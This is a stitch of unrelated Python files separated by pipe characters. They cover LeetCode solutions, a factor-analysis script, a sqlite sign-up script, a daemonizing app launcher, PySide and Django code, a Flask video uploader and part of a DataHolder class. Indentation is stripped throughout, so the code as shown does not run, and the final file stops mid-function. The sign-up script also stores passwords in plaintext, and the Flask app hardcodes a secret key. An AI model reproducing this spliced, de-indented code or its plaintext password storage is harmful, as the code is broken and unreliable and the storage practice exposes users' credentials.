class Solution:
'''O(nlogn) by using sorting
'''
def missingNumber(self, nums: List[int]) -> int:
nums.sort()
for i in range(len(nums)):
if i != nums[i]:
return i
return len(nums)
class Solution:
'''O(n) time
let the index equals the element, i.e., nums[i] == i
'''
def missingNumber(self, nums: List[int]) -> int:
# step 1: see if elelment n is there
n = len(nums)
if max(nums) != n:
return n
nums.append(n) # n already exist, adding another n in the end doesn't affect
# step 1: let nums[i] == i
for i in range(n):
cur = i
if nums[cur] != cur:
prev = nums[nums[cur]]
nums[nums[cur]] = nums[cur]
while nums[prev] != prev:
new_prev = nums[prev]
nums[prev] = prev
prev = new_prev
# step 2: find the missing one
for i in range(len(nums)):
if i != nums[i]:
return i
class Solution:
'''using math...
'''
def missingNumber(self, nums: List[int]) -> int:
n = len(nums)
expected_sum = n * (n + 1) // 2
real_sum = sum(nums)
return expected_sum - real_sum
nums = [9,6,4,2,3,5,7,0,1]
# nums = [3, 0, 1]
s = Solution()
print(s.missingNumber(nums))
# @lc code=end
|
import math
import numpy
import matplotlib
valorPI = math.pi
print("Squared:",valorPI**2)
print("Doble: ",valorPI*2)
print("Valor de pi: ",valorPI)
|
import pandas as pd
import numpy as np
import settings
df = settings.task_15_table
df_st = (df - df.mean()) / df.std(ddof=1)
print(df_st)
n = len(df)
m = p = len(df.columns)
XH = df_st.values
R = df.corr().values
print("R")
print(R)
chi_st = -(n - (2 * p + 5) / 6) * np.log(np.abs(np.linalg.det(R)))
print()
print("chi_st", chi_st, ">? 18.307")
R_1 = np.linalg.inv(R)
h2 = 1 - 1 / np.diag(R_1)
print("h2\n", h2)
Rh = R.copy()
np.fill_diagonal(Rh, h2)
print("Rh\n", Rh)
alpha, eigvec = np.linalg.eig(R)
alpha, eigvec = np.array(sorted(zip(alpha, eigvec), key=lambda x: x[0], reverse=True)).T
print("Eigenvalues, Eigenvectors")
eigvec = np.stack(eigvec)
print(alpha)
print(eigvec)
r = 3 # len(list(filter(lambda x: x > 1, alpha)))
print("r =", r)
V = np.array(eigvec[:r])
A = V.T.dot(np.diag(alpha[:r] ** 0.5))
print("A\n", np.round(A.astype(float), 2))
chi_st = (n - (2 * m + 5) / 6 - 2 * r / 3) * np.log(
np.linalg.det(A.T.dot(A).astype(float)) / np.linalg.det(R)
)
print(chi_st, ">? 11.34")
qval = {}
for i in range(5, 91, 5):
T12 = np.array(
[
[np.cos(np.deg2rad(i)), np.sin(np.deg2rad(i)), 1],
[-np.sin(np.deg2rad(i)), np.cos(np.deg2rad(i)), 0],
[0, 0, 1,],
]
)
T13 = np.array(
[
[np.cos(np.deg2rad(i)), 0, np.sin(np.deg2rad(i))],
[0, 1, 0,],
[-np.sin(np.deg2rad(i)), 0, np.cos(np.deg2rad(i))],
]
)
T23 = np.array(
[
[1, 0, 0,],
[0, np.cos(np.deg2rad(i)), np.sin(np.deg2rad(i))],
[0, -np.sin(np.deg2rad(i)), np.cos(np.deg2rad(i))],
]
)
T = T12.dot(T13).dot(T23)
Ah = A.dot(T)
q = np.sum((np.sum(Ah ** 4, axis=1) - np.sum(Ah ** 2, axis=1) ** 2) / (r ** 2))
# print(i, q)
qval[q] = (T, i)
qmax = max(qval.keys())
(T, i) = qval[qmax]
print("max angle", i)
print("T\n", T)
Ah = A.dot(T.T)
print("Ah\n", np.round(Ah.astype(float), 2))
F = A.T.dot(np.linalg.inv(R)).dot(XH.T)
print("F\n", np.round(F.astype(float), 2))
|
def sort(li):
for i in range(len(li)):
while i > 0 and li[i] < li[i - 1]:
li[i], li[i - 1] = li[i - 1], li[i]
i -= 1
return li
print(sort([74, 32, 89, 55, 21, 64]))
|
import random
time=random.randint(0,23)
TF=random.choice([True,False])
print("현재 시간은 %d 시 이고 날씨는 %s"%(time,TF))
if(time>=6 and time<=9 )and (TF==True):
print("노래한다")
else:
print("노래하지 않는다")
|
from getpass import getpass
from validation import *
import sqlite3
conn = sqlite3.connect('data.sqlite')
cur = conn.cursor()
cur.execute('''CREATE TABLE IF NOT EXISTS User
(id INTEGER PRIMARY KEY, username TEXT, password TEXT) ''')
username = input('Enter username: ')
password = getpass('Enter password: ')
parse = Validation(password)
print(parse.authenticate())
parser = Authentication(username)
print(parser.validate())
parse_4 = parse and parser
if parse_4 :
cur.execute('INSERT OR IGNORE INTO User (username, password) VALUES (?,?)', (username, password) )
conn.commit()
else :
quit()
cur.execute('SELECT * FROM User WHERE id != (select max(id)) ')
row = cur.fetchall()
#print(row)
for rows in row :
for info in rows :
try :
if username not in info :
pass
else:
cur.execute('DELETE FROM User WHERE username = ?', (username, ) )
conn.commit()
print('Username already taken try again')
break
except :
con_password = getpass('Confirm password: ')
if password == con_password :
print('Signing in ......')
break
else:
cur.execute('DELETE FROM User WHERE password = ?', (password, ) )
conn.commit()
print ('Password not matched')
cur.close()
|
import os, sys, signal
from fabric.api import settings, local
from secrets import BASE_DIR
MONITOR_DIR = os.path.join(BASE_DIR, ".monitor")
def startDaemon(log_file, pid_file):
print "DAEMONIZING PROCESS>>> (STDIN %d)" % sys.stdin.fileno()
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError, e:
print e.errno
sys.exit(1)
os.chdir("/")
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
sys.exit(0)
except OSError, e:
print e.errno
sys.exit(1)
si = file('/dev/null', 'r')
so = file(log_file, 'a+')
se = file(log_file, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
print ">>> PROCESS DAEMONIZED"
def stopDaemon(pid_file, extra_pids_port=None):
from subprocess import Popen, PIPE
pid = False
try:
f = open(pid_file, 'r')
try:
pid = int(f.read().strip())
except ValueError as e:
print "NO PID AT %s" % pid_file
except IOError as e:
print "NO PID AT %s" % pid_file
if pid:
print "STOPPING DAEMON on pid %d" % pid
try:
os.kill(pid, signal.SIGTERM)
if extra_pids_port is not None:
pids = Popen(['lsof', '-t', '-i:%d' % int(extra_pids_port)], stdout=PIPE)
pid = pids.stdout.read().strip()
pids.stdout.close()
for p in pid.split("\n"):
cmd = ['kill', str(p)]
Popen(cmd)
return True
except OSError as e:
print "could not kill process at PID %d" % pid
return False
class POEException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ProofOfExistenceApp():
def __init__(self):
print "new notary instance"
self.in_service = False
def start_app(self):
import redis
from rom import util
from paste import httpserver
startDaemon(os.path.join(MONITOR_DIR, "app.log"), os.path.join(MONITOR_DIR, "app.pid"))
try:
util.CONNECTION = redis.Redis(host="localhost", db=0)
httpserver.serve(self.api, host="localhost", port=os.environ.get('API_PORT', 8700))
except AttributeError as e:
print e, type(e)
def start(self):
print "starting app"
try:
from main import app
except Exception as e:
print e, type(e)
return False
from multiprocessing import Process
from fabric.api import settings, local
try:
# START API
self.api = app
p = Process(target=self.start_app)
p.start()
p.join()
# START CRON
'''
with settings(warn_only=True):
local("crontab %s" % os.path.join(BASE_DIR, "cron.tab"))
'''
return True
except Exception as e:
print e, type(e)
return False
def stop(self):
print "stopping app"
'''
with settings(warn_only=True):
local("crontab -r")
'''
return stopDaemon(os.path.join(MONITOR_DIR, "app.pid"), extra_pids_port=os.environ.get('API_PORT', None))
if __name__ == "__main__":
usage_prompt = "usage: app.py [start|stop|restart] --base-dir=/path/to/configs/dir"
if len(sys.argv) < 2:
print usage_prompt
sys.exit(-1)
res = False
app = ProofOfExistenceApp()
if sys.argv[1] in ["restart", "stop"]:
res = app.stop()
if sys.argv[1] in ["restart", "start"]:
res = app.start()
sys.exit(0 if res else -1)
|
import os
from collections import defaultdict
import logging
import numpy as np
from PySide import QtGui, QtCore
from PySide.QtCore import Qt
from pubsub import pub
from ..models import model
from ..settings import settings
from treewidgetitem import TreeWidgetItem
class Singleton(object):
_instance = None
def __new__(class_, *args, **kwargs):
if not isinstance(class_._instance, class_):
class_._instance = object.__new__(class_, *args, **kwargs)
return class_._instance
class MeasurementTree(QtGui.QWidget, Singleton):
def __init__(self, parent=None):
super(MeasurementTree, self).__init__(parent)
self.model = model.model
self.colors = settings.settings.colors
self.contact_dict = settings.settings.contact_dict
# Create a list widget
self.measurement_tree = QtGui.QTreeWidget(self)
self.measurement_tree.setMinimumWidth(300)
self.measurement_tree.setMaximumWidth(300)
self.measurement_tree.setColumnCount(5)
self.measurement_tree.setHeaderLabels(["Name", "Label", "Length", "Surface", "Force"])
self.measurement_tree.itemActivated.connect(self.item_activated)
self.measurement_tree.setItemsExpandable(False)
# Set the widths of the columns
self.measurement_tree.setColumnWidth(0, 75)
for column in xrange(1, self.measurement_tree.columnCount()):
self.measurement_tree.setColumnWidth(column, 55)
self.layout = QtGui.QVBoxLayout()
self.layout.addWidget(self.measurement_tree)
self.setLayout(self.layout)
pub.subscribe(self.update_measurements_tree, "update_measurement_status")
def select_initial_measurement(self):
self.current_measurement_index = 0
measurement_item = self.measurement_tree.topLevelItem(self.current_measurement_index)
self.measurement_tree.setCurrentItem(measurement_item, True)
# We need to set a measurement name, before we can get contacts from it
self.put_measurement()
# For the current measurement, select the first of each contact labels (if available)
self.select_initial_contacts()
def select_initial_contacts(self):
measurement_item = self.measurement_tree.currentItem()
# If the tree is empty, there's nothing to select
if measurement_item is None:
return
measurement_name = measurement_item.text(0)
lookup = {0: 0, 1: 0, 2: 0, 3: 0}
for index in range(measurement_item.childCount()):
contact = self.model.contacts[measurement_name][index]
if contact.contact_label in lookup and not lookup[contact.contact_label]:
self.model.put_contact(contact_id=contact.contact_id)
lookup[contact.contact_label] = 1
# TODO I should split this function up, such that reloading the tree is independent of setting indices and such
def update_measurements_tree(self):
self.measurement_tree.clear()
# Create a green brush for coloring stored results
green_brush = QtGui.QBrush(QtGui.QColor(46, 139, 87))
current_measurement_item = None
for measurement in self.model.measurements.values():
measurement_item = QtGui.QTreeWidgetItem(self.measurement_tree, [measurement])
measurement_item.setText(0, measurement.measurement_name)
measurement_item.setText(1, measurement.measurement_id)
measurement_item.setFirstColumnSpanned(True)
measurement_item.setExpanded(True)
# If we reach the current measurement, store a reference to that measurement item
if measurement.measurement_name == self.model.measurement_name:
current_measurement_item = measurement_item
for contact in self.model.contacts[measurement.measurement_name]:
contact_item = TreeWidgetItem(measurement_item)
contact_item.setText(0, str(contact.contact_id.split("_")[-1]))
contact_item.setText(1, self.contact_dict[contact.contact_label])
contact_item.setText(2, str(contact.length)) # Sets the frame count
max_surface = np.max(contact.surface_over_time)
contact_item.setText(3, str(int(max_surface)))
max_force = np.max(contact.force_over_time)
contact_item.setText(4, str(int(max_force)))
if contact.invalid:
color = self.colors[-3]
else:
color = self.colors[contact.contact_label]
color.setAlphaF(0.5)
for idx in xrange(contact_item.columnCount()):
contact_item.setBackground(idx, color)
# If several contacts have been labeled, marked the measurement
if measurement.processed:
for idx in xrange(measurement_item.columnCount()):
measurement_item.setForeground(idx, green_brush)
if current_measurement_item:
# Scroll the tree to the current measurement item
self.measurement_tree.scrollToItem(current_measurement_item, hint=QtGui.QAbstractItemView.PositionAtTop)
# Sort the tree by measurement name
self.measurement_tree.sortByColumn(0, Qt.AscendingOrder)
# Initialize the current contact index, which we'll need for keep track of the labeling
self.model.current_contact_index = 0
#self.model.current_measurement_index = 0
measurement_item = self.get_current_measurement_item()
self.measurement_tree.setCurrentItem(measurement_item, True)
def update_current_contact(self):
measurement_item = self.get_current_measurement_item()
contact_item = measurement_item.child(self.model.current_contact_index)
self.measurement_tree.setCurrentItem(contact_item)
def item_activated(self):
# Check if the tree aint empty!
if not self.measurement_tree.topLevelItemCount():
return
current_item = self.measurement_tree.currentItem()
if current_item.parent():
self.put_contact()
else:
self.put_measurement()
# TODO Change this so it first checks what we clicked on and then calls the right function
def put_measurement(self):
# Check if the tree aint empty!
if not self.measurement_tree.topLevelItemCount():
return
current_item = self.measurement_tree.currentItem()
# Only put the measurement if we selected a measurement
if current_item.parent():
return
# TODO what did I need this for again?
self.model.current_measurement_index = self.measurement_tree.indexOfTopLevelItem(current_item)
# Notify the model to update the subject_name + measurement_name if necessary
measurement_id = current_item.text(1)
self.model.put_measurement(measurement_id=measurement_id)
def put_contact(self):
# Check to make sure the measurement is selected first
current_item = self.measurement_tree.currentItem()
measurement_item = current_item.parent()
self.measurement_tree.setCurrentItem(measurement_item)
self.put_measurement()
# Now put the contact
#contact_id = int(current_item.text(0)) # Convert the unicode to int
contact_id = "contact_{}".format(current_item.text(0))
for index, contact in enumerate(self.model.contacts[self.model.measurement_name]):
if contact.contact_id == contact_id:
self.model.current_contact_index = index
self.model.put_contact(contact_id=contact_id)
def get_current_measurement_item(self):
return self.measurement_tree.topLevelItem(self.model.current_measurement_index)
class TreeWidgetItem(QtGui.QTreeWidgetItem):
"""
I want to sort based on the contact id as a number, not a string, so I am creating my own version
based on this SO answer:
http://stackoverflow.com/questions/21030719/sort-a-pyside-qtgui-qtreewidget-by-an-alpha-numeric-column
"""
def __lt__(self, other):
column = self.treeWidget().sortColumn()
key_1 = self.text(column).split("_")[-1]
key_2 = other.text(column).split("_")[-1]
return int(key_1) < int(key_2)
|
# Create your views here.
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import register_converter
from django.views.decorators.csrf import csrf_exempt
from .form import LoginForm
from django.contrib.auth import authenticate, login
from . import converters
from .models import comment
def myyear(request, year):
return render(request, 'yearview.html')
# 输出电影评论的数据到模板上面
def movie_comment(request):
#condtions = {'stars__gt': 3}
n = comment.objects.filter(stars__gt=3).all()
#comments = n.comment_text[0]
return render(request, 'index.html', locals())
# 输出查询按钮的数据到模板上面
def search(request):
q = request.GET.get('q')
print(q)
error_msg = ''
if not q or q =='':
error_msg = '请输入关键词'
return render(request, 'errors.html', {'error_msg': error_msg})
n = comment.objects.filter(comment_text__icontains=q)
return render(request, 'index.html',locals())
def login(request):
if request.method == 'POST':
login_form = LoginForm(request.POST)
if login_form.is_valid():
# 读取表单的返回值
cd = login_form.cleaned_data
if len(cd['password'])<2:
raise ValidationError('Password too short')
user = authenticate(username=cd['username'], password=cd['password'])
if user:
# 登陆用户
#login(request, user)
return render(request, 'result2.html', locals())
#HttpResponse('登录成功')
else:
return HttpResponse('登录失败')
if request.method == "GET":
login_form = LoginForm()
return render(request, 'form.html', {'form': login_form}) |
w0 = -59.50
w1 = -0.15
w2 = 0.60
def t(o, a, h, p):
d = o - p
#print("{}\t{}\t{}\t{}\t{}".format(d, d ** 2, d, d * a, d * h))
return [d, d ** 2, d, d * a, d * h]
data = [[37.99, 41, 138, 17.15],
[47.34, 42, 133, 26.00],
[44.38, 37, 151, 25.55],
[28.17, 46, 133, 13.40],
[27.07, 48, 126, 8.90],
[37.85, 44, 145, 20.90],
[44.72, 43, 158, 28.85],
[36.42, 46, 143, 19.40],
[31.21, 37, 138, 17.75],
[54.85, 38, 158, 29.60],
[39.84, 43, 143, 19.85],
[30.83, 43, 138, 16.85]]
#use ocr tool to do that
l=list()
for i in data:
l.append(t(i[0], i[1], i[2], i[3]))
for i in range(5):
s=0
for o in range(len(l)):
s+=l[o][i]
print("{}".format(s),end="\t")
print()
nw0 = -59.50
nw1 = -0.1313714
nw2 = 0.6627366
for i in range(len(data)):
data[i][3]=nw0+nw1*data[i][1]+nw2*data[i][2]
l=list()
for i in data:
l.append(t(i[0], i[1], i[2], i[3]))
for i in range(5):
s=0
for o in range(len(l)):
s+=l[o][i]
print("{}".format(s),end="\t")
|
if __name__ == "__main__":
device_dict = {}
user = {'username':{'1':'2'}}
user2 = {'3':'4'}
device_dict.update(user)
device_dict.get('username',0).update(user2)
print(device_dict) |
"""Noisebyte uploader flask app"""
import os
import binascii
from subprocess import call
import threading
from secrets import APPROVE_SLACK_TOKEN, TRASH_SLACK_TOKEN, SLACK_WEBHOOK_URL, FLASK_SECRET_KEY
from flask import Flask, request, redirect, flash, render_template
import requests
import youtube_uploader
UPLOAD_FOLDER = './uploads'
TEMP_FOLDER = './temp'
ALLOWED_EXTENSIONS = set(['mov', 'mp4', 'avi', 'mkv', 'wmv', 'mpeg4', 'mpg'])
BASE_ADDR='/noisebytes/'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.url_map.strict_slashes = False
app.secret_key = FLASK_SECRET_KEY
def youtube_video_url(id):
return 'https://www.youtube.com/watch?v=' + id
def log_to_slack(msg):
payload = {
"channel": "#noisebytes",
"username": "noisebytes-moderation-bot",
"text": msg,
"icon_emoji": ":vibration_mode:"
}
return requests.post(SLACK_WEBHOOK_URL, json=payload)
@app.route("/slack/approve", methods=['POST'])
def approve_command_handler():
if request.form['token'] != APPROVE_SLACK_TOKEN:
return ':('
video_id = request.form['text']
user = request.form['user_name']
ret = youtube_uploader.approve_video(video_id)
if ret == "Approved":
log_to_slack(user + ' approved video ' + youtube_video_url(video_id))
return "Video successfully approved"
if ret == "AlreadyApproved":
return "That video has already been approved :)"
return "Unknown return value, please contact @beka and/or @rizend"
@app.route("/slack/trash", methods=['POST'])
def trash_command_handler():
if request.form['token'] != TRASH_SLACK_TOKEN:
return ':('
video_id = request.form['text']
user = request.form['user_name']
ret = youtube_uploader.trash_video(video_id)
if ret == "Trashed":
log_to_slack(user + ' trashed video ' + youtube_video_url(video_id))
return "Video successfully trashed"
if ret == "AlreadyTrashed":
return "That video has already been trashed :)"
return "Unknown return value, please contact @beka and/or @rizend"
def title_of_processed_video(title, author):
return "Noisebytes - " + title + " by " + author
def description_of_video(title, author):
return "Title: " + title + "\n" +\
"Author: " + author + "\n" +\
"Patreon: https://patreon.com/noisebridge\n" +\
"Website: https://noisebridge.net/\n\n" +\
"Noisebridge is a 501(c)3 non-profit hackerspace in San Francisco's Mission District, located at 2169 Mission St.\n\n"+\
"We're open to the public every day from 11am to 10pm, so feel free to drop by!\n\n" +\
"We're also funded entirely by the community, so please donate if you like what we do, or the content we produce.\n\n" +\
"Noisebridge is a safe space. You can read about what that means to us at the pages listed here: https://www.noisebridge.net/wiki/Safe_Space"
def random_name():
return binascii.b2a_hex(os.urandom(16))
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file_handler():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
print "No file part"
return redirect(BASE_ADDR)
posted_file = request.files['file']
if posted_file.filename == '':
flash('No selected file')
print "No selected file"
return redirect(BASE_ADDR)
if not allowed_file(posted_file.filename):
flash('Invalid file type. Try these: ' + ' '.join(x for x in ALLOWED_EXTENSIONS))
print "Invalid file type"
return redirect(BASE_ADDR)
if posted_file:
flash('Your file is uploading.')
title = request.form['title']
author = request.form['author']
temp_name = random_name()
extension = posted_file.filename.rsplit('.', 1)[1].lower()
upload_file = os.path.join(UPLOAD_FOLDER, temp_name + '.' + extension)
processed_file = os.path.join(TEMP_FOLDER, temp_name + '.mp4')
posted_file.save(upload_file)
def upload_to_youtube_thread():
call(["bash", "./process_video.sh", title, author,
upload_file,
processed_file])
video_id = youtube_uploader.upload_video(title_of_processed_video(title, author),
description_of_video(title, author),
processed_file)
if video_id:
log_to_slack("Video " + youtube_video_url(video_id) + " ready for moderation. " +
"You can approve it by typing `/approve_noisebyte " + video_id + "`, or trash it "+
"by typing `/trash_noisebyte " + video_id + "`")
else:
log_to_slack("An error was encountered while uploading a video")
os.remove(upload_file)
os.remove(processed_file)
threading.Thread(target=upload_to_youtube_thread).start()
return redirect(BASE_ADDR)
return render_template('uploader_app.html')
if __name__ == '__main__':
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
app.run(host="127.0.0.1", port=int("3114"), debug=False)
|
__all__ = ['CommError']
class CommError(Exception):
""" An exception that specifies that a low-level communication error occurred. These should only
be thrown for serious communications errors. The top-level event loop will close/cleanup/destroy
any running command. The error message will be returned on distxt.
"""
def __init__(self, device, error, details=None):
""" Create a CommError.
Args:
device - name of the device that had an error.
error - one line of text, intended for users. Will be returned on distxt.
details - optional text, intended for operators/programmers. Will be returned on diserrtxt.
"""
Exception.__init__(self)
self.device = device
self.error = error
self.details = details
if details:
self.args = (device, error, details)
else:
self.args = (device, error)
|
import unittest
from backend.managers.logic import LogicManager
class TestLogicManager(unittest.TestCase):
def setUp(self):
pass
|
class calculate:
def __init__(self):
hehe=0
# print("")
# y=teach()
def make(self, str):
cal = 0
cal1=0
l=len(str)
for i in range(l):
# print(len(str))
# if ((str[i] >= 'a' and str[i] <= 'f')):
# print(i)
def f(x):
return {
'A': 10,
'B': 11,
'C': 12,
'D': 13,
'E': 14,
'F': 15,
}.get(x, x)
# z=f(str[i])
# print(z)
z = f(str[l-i-1])
cal = cal + int(z) * 16**i
# cal1= cal1*10+int(z)
# print(cal)
# print(cal1)
a=0
mul=0
while(cal>0):
#print("jerin")
#print("cal:",cal)
r = cal % 2
mul=mul+(10**a)*r
#print("r:",r)
cal=int(cal/2)
a=a+1
#mul.format(10)
#mul= bin(ffff)
#"{0:b}".format(10)
# print("mul:",mul)
return mul
# str = "0A"
# m = calculate()
# y = calculate.make(m, str)
# print(y)
|
# -*- coding: utf-8 -*-
# Built-in
import sys
import os
# import itertools as itt
import copy
import warnings
from abc import ABCMeta, abstractmethod
import inspect
# Common
import numpy as np
# import scipy.interpolate as scpinterp
# import matplotlib.pyplot as plt
# from matplotlib.tri import Triangulation as mplTri
# tofu
from tofu import __version__ as __version__
import tofu.pathfile as tfpf
import tofu.utils as utils
try:
import tofu.data._comp as _comp
import tofu.data._plot as _plot
import tofu.data._def as _def
import tofu._physics as _physics
except Exception:
from . import _comp as _comp
from . import _plot as _plot
from . import _def as _def
from .. import _physics as _physics
__all__ = ['DataHolder'] # , 'Plasma0D']
_SAVEPATH = os.path.abspath('./')
_INTERPT = 'zero'
#############################################
#############################################
# Abstract Parent class
#############################################
#############################################
class DataHolder(utils.ToFuObject):
""" A generic class for handling data
Provides methods for:
- introspection
- plateaux finding
- visualization
"""
# Fixed (class-wise) dictionary of default properties
_ddef = {'Id': {'include': ['Mod', 'Cls',
'Name', 'version']},
'dgroup': ['lref'],
'dref': ['group', 'size', 'ldata'],
'ddata': ['refs', 'shape', 'groups', 'data'],
'params': {'origin': (str, 'unknown'),
'dim': (str, 'unknown'),
'quant': (str, 'unknown'),
'name': (str, 'unknown'),
'units': (str, 'a.u.')}}
_reserved_all = _ddef['dgroup'] + _ddef['dref'] + _ddef['ddata']
_show_in_summary = 'all'
def __init_subclass__(cls, **kwdargs):
# Does not exist before Python 3.6 !!!
# Python 2
super(DataHolder, cls).__init_subclass__(**kwdargs)
# Python 3
# super().__init_subclass__(**kwdargs)
cls._ddef = copy.deepcopy(DataHolder._ddef)
# cls._dplot = copy.deepcopy(Struct._dplot)
# cls._set_color_ddef(cls._color)
def __init__(self, dref=None, ddata=None,
Id=None, Name=None,
fromdict=None, SavePath=os.path.abspath('./'),
SavePath_Include=tfpf.defInclude):
# Create a dplot at instance level
# self._dplot = copy.deepcopy(self.__class__._dplot)
kwdargs = locals()
del kwdargs['self']
# super()
super(DataHolder, self).__init__(**kwdargs)
def _reset(self):
# Run by the parent class __init__()
# super()
super(DataHolder, self)._reset()
self._dgroup = {kd[0]: kd[1] for kd in self._get_keys_dgroup()}
self._dref = {kd[0]: kd[1] for kd in self._get_keys_dref()}
self._ddata = {kd[0]: kd[1] for kd in self._get_keys_ddata()}
@classmethod
def _checkformat_inputs_Id(cls, Id=None, Name=None,
include=None, **kwdargs):
if Id is not None:
assert isinstance(Id, utils.ID)
Name = Id.Name
assert isinstance(Name, str), Name
if include is None:
include = cls._ddef['Id']['include']
kwdargs.update({'Name': Name, 'include': include})
return kwdargs
###########
# Get largs
###########
@staticmethod
def _get_largs_dref():
largs = ['dref']
return largs
@staticmethod
def _get_largs_ddata():
largs = ['ddata']
return largs
###########
# Get check and format inputs
###########
# ---------------------
# Methods for checking and formatting inputs
# ---------------------
def _extract_known_params(self, key, dd):
# Extract relevant parameters
dparams = {kk: vv for kk, vv in dd.items()
if kk not in self._reserved_all}
# Add minimum default parameters if not already included
for kk, vv in self._ddef['params'].items():
if kk not in dparams.keys():
dparams[kk] = vv[1]
else:
# Check type if already included
if not isinstance(dparams[kk], vv[0]):
vtyp = str(type(vv[0]))
msg = "A parameter for %s has the wrong type:\n"%key
msg += " - Provided: type(%s) = %s\n"%(kk, vtyp)
msg += " - Expected %s"%str(self._ddef['params'][kk][0])
raise Exception(msg)
return dparams
def _checkformat_dref(self, dref):
c0 = isinstance(dref, dict)
c0 = c0 and all([isinstance(kk, str) and isinstance(vv, dict)
for kk, vv in dref.items()])
if not c0:
msg = "Provided dref must be dict !\n"
msg += "All its keys must be str !\n"
msg += "All its values must be dict !"
raise Exception(msg)
# Two options:
# (A) - {'group0':{'t0':{'data':t0, 'units':'s'}, 't1':...}}
# (B) - {'t0':{'data':t0, 'units':'s', 'group':'group0'}, 't1':...}
cA = all([all([(isinstance(v1, dict) and 'group' not in v1.keys())
or not isinstance(v1, dict)
for v1 in v0.values()])
and 'group' not in v0.keys() for v0 in dref.values()])
cB = all([isinstance(v0.get('group', None), str)
for v0 in dref.values()])
if not (cA or cB):
msg = "Provided dref must formatted either as a dict with:\n\n"
msg += " - keys = group, values = {ref: data}:\n"
msg += " {'g0':{'t0':{'data':t0, 'units':'s'},\n"
msg += " 't1':{'data':t1, 'units':'h'}},\n"
msg += " 'g1':{'t2':{'data':t2, 'units':'min'}}}\n\n"
msg += " - keys = ref, values = {data, group}:\n"
msg += " {'t0':{'data':t0, 'units':'s', 'group':'g0'},\n"
msg += " 't1':{'data':t1, 'units':'h', 'group':'g0'},\n"
msg += " 't2':{'data':t2, 'units':'min', 'group':'g1'}"
raise Exception(msg)
if cA:
# Convert to cB
drbis = {}
for k0, v0 in dref.items():
for k1, v1 in v0.items():
if isinstance(v1, dict):
drbis[k1] = v1
drbis['group'] = k0
else:
drbis[k1] = {'data': v1, 'group': k0}
dref = drbis
# Check cB
for kk, vv in dref.items():
# Check if new group
if vv['group'] not in self._dgroup['lkey']:
self._dgroup['dict'][vv['group']] = {}
self._dgroup['lkey'].append(vv['group'])
# Check key unicity
if kk in self._ddata['lkey']:
msg = "key '%s' already used !\n"%kk
msg += " => each key must be unique !"
raise Exception(msg)
# Check data
c0 = 'data' in vv.keys()
data = vv['data']
if not isinstance(data, np.ndarray):
if isinstance(data, list) or isinstance(data, tuple):
try:
data = np.atleast_1d(data).ravel()
size = data.size
except Exception as err:
c0 = False
else:
size = data.__class__.__name__
else:
if data.ndim != 1:
data = np.atleast_1d(data).ravel()
size = data.size
if not c0:
msg = "dref[%s]['data'] must be array-convertible\n"%kk
msg += "The following array conversion failed:\n"
msg += " - np.atleast_1d(dref[%s]['data']).ravel()"%kk
raise Exception(msg)
# Fill self._dref
self._dref['dict'][kk] = {'size': size, 'group': vv['group']}
self._dref['lkey'].append(kk)
# Extract and check parameters
dparams = self._extract_known_params(kk, vv)
# Fill self._ddata
self._ddata['dict'][kk] = dict(data=data, refs=(kk,),
shape=(size,), **dparams)
self._ddata['lkey'].append(kk)
# ------------- DB (start)
def __repr__(self):
return self.__class__.__name__
# ------------- DB (end)
def _checkformat_ddata(self, ddata):
c0 = isinstance(ddata, dict)
c0 = c0 and all([isinstance(kk, str) for kk in ddata.keys()])
if not c0:
msg = "Provided ddata must be dict !\n"
msg += "All its keys must be str !"
raise Exception(msg)
# Start check on each key
for kk, vv in ddata.items():
# Check value is a dict with proper keys
c0 = isinstance(vv, dict)
c0 = c0 and 'refs' in vv.keys() and isinstance(vv['refs'], tuple)
c0 = c0 and 'data' in vv.keys()
if not c0:
msg = "ddata must contain dict with at least the keys:\n"
msg += " - 'refs': a tuple indicating refs dependencies\n"
msg += " - 'data': a 1d array containing the data"
raise Exception(msg)
# Check key unicity
if kk in self._ddata['lkey']:
msg = "key '%s' already used !\n"%kk
msg += " => each key must be unique !"
raise Exception(msg)
# Extract data and shape
data = vv['data']
if not isinstance(data, np.ndarray):
if isinstance(data, list) or isinstance(data, tuple):
try:
data = np.asarray(data)
shape = data.shape
except Exception as err:
assert type(data) in [list, tuple]
shape = (len(data),)
else:
shape = data.__class__.__name__
else:
data = np.atleast_1d(np.squeeze(data))
shape = data.shape
# Check proper ref (existence and shape / size)
for ii, rr in enumerate(vv['refs']):
if rr not in self._dref['lkey']:
msg = "ddata[%s] depends on an unknown ref !\n"%kk
msg += " - ddata[%s]['refs'] = %s\n"%(kk, rr)
msg += " => %s not in self.dref !\n"%rr
msg += " => self.add_ref( %s ) first !"%rr
raise Exception(msg)
shaprf = tuple(self._dref['dict'][rr]['size'] for rr in vv['refs'])
if not shape == shaprf:
msg = "Inconsistency between data shape and ref size !\n"
msg += " - ddata[%s]['data'] shape: %s\n"%(kk, str(shape))
msg += " - sizes of refs: %s"%(str(shaprf))
raise Exception(msg)
# Extract params and set self._ddata
dparams = self._extract_known_params(kk, vv)
self._ddata['dict'][kk] = dict(data=data, refs=vv['refs'],
shape=shape, **dparams)
self._ddata['lkey'].append(kk)
def _complement_dgrouprefdata(self):
# --------------
# ddata
assert len(self._ddata['lkey']) == len(self._ddata['dict'].keys())
for k0 in self._ddata['lkey']:
v0 = self._ddata['dict'][k0]
# Check all ref are in dref
lrefout = [ii for ii in v0['refs'] if ii not in self._dref['lkey']]
if len(lrefout) != 0:
msg = "ddata[%s]['refs'] has keys not in dref:\n"%k0
msg += " - " + "\n - ".join(lrefout)
raise Exception(msg)
# set group
grps = tuple(self._dref['dict'][rr]['group'] for rr in v0['refs'])
gout = [gg for gg in grps if gg not in self._dgroup['lkey']]
if len(gout) > 0:
lg = self._dgroup['lkey']
